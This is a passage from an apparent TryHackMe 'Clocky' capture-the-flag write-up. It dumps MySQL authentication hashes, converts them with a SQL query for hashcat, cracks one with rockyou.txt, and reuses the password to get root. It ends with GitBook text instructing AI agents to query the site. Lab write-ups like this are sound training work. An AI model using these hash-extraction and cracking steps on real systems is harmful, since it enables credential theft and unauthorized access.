             max_updates: 0
         max_connections: 0
    max_user_connections: 0
                  plugin: caching_sha2_password
   authentication_string: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
        password_expired: N
   password_last_changed: 2023-02-22 05:57:08
       password_lifetime: NULL
          account_locked: Y
        Create_role_priv: N
          Drop_role_priv: N
  Password_reuse_history: NULL
     Password_reuse_time: NULL
Password_require_current: NULL
         User_attributes: NULL
*************************** 7. row ***************************
                    Host: localhost
                    User: mysql.session
             Select_priv: N
           
    max_user_connections: 0
                  plugin: caching_sha2_password
   authentication_string: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
        password_expired: N
   password_last_changed: 2023-02-22 05:57:08
       password_lifetime: NULL
          account_locked: Y
        Create_role_priv: N
          Drop_role_priv: N
  Password_reuse_history: NULL
     Password_reuse_time: NULL
Password_require_current: NULL
         User_attributes: NULL
*************************** 8. row ***************************
                    Host: localhost
                    User: mysql.sys
             Select_priv: N
             Insert_priv: N
             Update_priv: N
             Delete_priv: N
             Create_priv: N
             
          <SNIP>
          
         max_connections: 0
    max_user_connections: 0
                  plugin: caching_sha2_password
   authentication_string: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
        password_expired: N
   password_last_changed: 2023-02-22 05:57:08
       password_lifetime: NULL
          account_locked: Y
        Create_role_priv: N
          Drop_role_priv: N
  Password_reuse_history: NULL
     Password_reuse_time: NULL
Password_require_current: NULL
         User_attributes: NULL
*************************** 9. row ***************************
                    Host: localhost
                    User: root
             Select_priv: Y
             Insert_priv: Y
             Update_priv: Y
             Delete_priv: Y
 <SNIP>
```

```bash
mysql> SELECT Host, User, plugin, authentication_string FROM user\G
*************************** 1. row ***************************
                 Host: %
                 User: clocky_user
               plugin: caching_sha2_password
authentication_string: $A$005$~g]5C]]hmVcZUf8oIT96B7VRZhQibsUhSe5eKbHm4Lq1ks8pzxDkNM9
*************************** 2. row ***************************
                 Host: %
                 User: dev
               plugin: caching_sha2_password
/xuiN2%#pIV5@8=o1xaxXD13/Mh0rlloe/WqcmmaBDMF6r7wjvFGgoTSaB
*************************** 3. row ***************************
                 Host: localhost
                 User: clocky_user
               plugin: caching_sha2_password
authentication_string: $A$005$cg▒|\>B^:
                                       yCR0kSV+XwNDxm2lDD5W3J9551gjlVmOZ9Z9hH2Szailxm2VkL.
*************************** 4. row ***************************
                 Host: localhost
                 User: debian-sys-maint
               plugin: caching_sha2_password
authentication_string: $A$005$Ebh3▒N5a#f6HM?xF*uSqjNbbUYGitDq/yFLM8LbauDh83QtraQaETy6nZWtWc2
*************************** 5. row ***************************
                 Host: localhost
                 User: dev
               plugin: caching_sha2_password
authentication_string: $A$005$
8w|Q!N]rZX!mZ\?ok/WxQEdeRLNgqXpWEf4sJonZecawFUizD8FokeI5F.
*************************** 6. row ***************************
                 Host: localhost
                 User: mysql.infoschema
               plugin: caching_sha2_password
authentication_string: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
*************************** 7. row ***************************
                 Host: localhost
                 User: mysql.session
               plugin: caching_sha2_password
authentication_string: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
*************************** 8. row ***************************
                 Host: localhost
                 User: mysql.sys
               plugin: caching_sha2_password
authentication_string: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
*************************** 9. row ***************************
                 Host: localhost
                 User: root
               plugin: auth_socket
authentication_string: 
9 rows in set (0.00 sec)

```

Got the authentication strings.

The hash format looks unusual — it starts with `$A$005`, which corresponds to MySQL's newer `caching_sha2_password` plugin. The problem is that the raw hash extracted from the table isn't in a format that Hashcat directly accepts.

### Converting the MYSql hash for Hashcat

We can extract the hashes using the below command which found at the hashcat website.

```bash
https://hashcat.net/wiki/doku.php?id=example_hashes#:~:text=SELECT user%2C CONCAT('%24mysql'%2C SUBSTR(authentication_string%2C1%2C3)%2C LPAD(CONV(SUBSTR(authentication_string%2C4%2C3)%2C16%2C10)%2C4%2C0)%2C%27*%27%2CINSERT(HEX(SUBSTR(authentication_string%2C8))%2C41%2C0%2C%27*%27))%20AS%20hash%20FROM%20user%20WHERE%20plugin%20%3D%20%27caching_sha2_password%27%20AND%20authentication_string%20NOT%20LIKE%20%27%25INVALIDSALTANDPASSWORD%25%27%3B
```

```bash
mysql> SELECT user, CONCAT('$mysql', SUBSTR(authentication_string,1,3), LPAD(CONV(SUBSTR(authentication_string,4,3),16,10),4,0),'*',INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')) AS hash FROM user WHERE plugin = 'caching_sha2_password' AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%';
+------------------+-----------------------------------------------------------------------------------------------------------------------------------------------+
| user             | hash                                                                                                                                          |
+------------------+-----------------------------------------------------------------------------------------------------------------------------------------------+
| clocky_user      | $mysql$A$0005*077E1B6B675D350F435D5D1C686D12566C08635A*5566386F49543936423756525A68516962735568536535654B62486D344C71316B7338707A78446B4E4D39 |
| dev              | $mysql$A$0005*0D172F787569054E322523067049563540383D17*6F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142 |
| clocky_user      | $mysql$A$0005*63671A7C5C3E425E3A0C794352306B531456162B*58774E44786D326C44443557334A39353531676A6C566D4F5A395A39684832537A61696C786D32566B4C2E |
| debian-sys-maint | $mysql$A$0005*456268331A4E3561236636480E4D3F78462A7553*716A4E6262555947697444712F79464C4D384C62617544683833517472615161455479366E5A5774576332 |
| dev              | $mysql$A$0005*1C160A38777C5121134E5D725A58216D5A1D5C3F*6F6B2F577851456465524C4E6771587057456634734A6F6E5A656361774655697A4438466F6B654935462E |
+------------------+-----------------------------------------------------------------------------------------------------------------------------------------------+
5 rows in set (0.00 sec)
```

```bash
                                                                                                                                                                                                                                         
┌──(ajay㉿kali)-[~/Downloads]
└─$ hashcat -m 7401 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v7.1.2) starting

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-11th Gen Intel(R) Core(TM) i5-11320H @ 3.20GHz, 1456/2912 MB (512 MB allocatable), 2MCU

$mysql$A$005*0D172F787569054E322523067049563540383D17*6F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142:armadillo
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7401 (MySQL $A$ (sha256crypt))
Hash.Target......: $mysql$A$005*0D172F787569054E322523067049563540383D...536142
Time.Started.....: Tue Feb 24 16:20:32 2026, (1 min, 57 secs)
Time.Estimated...: Tue Feb 24 16:22:29 2026, (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:      429 H/s (10.24ms) @ Accel:14 Loops:1000 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 49980/14344385 (0.35%)
Rejected.........: 0/49980 (0.00%)
Restore.Point....: 49952/14344385 (0.35%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:4000-5000
Candidate.Engine.: Device Generator
Candidates.#01...: azzahra -> andres123
Hardware.Mon.#01.: Util: 94%

Started: Tue Feb 24 16:20:27 2026
Stopped: Tue Feb 24 16:22:30 2026
                                 
```

Found cred for dev.

```bash
clarice@ip-10-82-184-162:~$ su dev
su: user dev does not exist
clarice@ip-10-82-184-162:~$ 
```

But we don't have any user dev.

Bu the creds work against the root user and we got the root access.

## Shell as Root

```bash
root@ip-10-82-184-162:/# cd root
root@ip-10-82-184-162:~# ls
flag6.txt  snap
root@ip-10-82-184-162:~# cat flag6.txt 
THM{6ad86ac1463ea8afbe0edd6cdd708f36}
root@ip-10-82-184-162:~# 
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-clocky.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
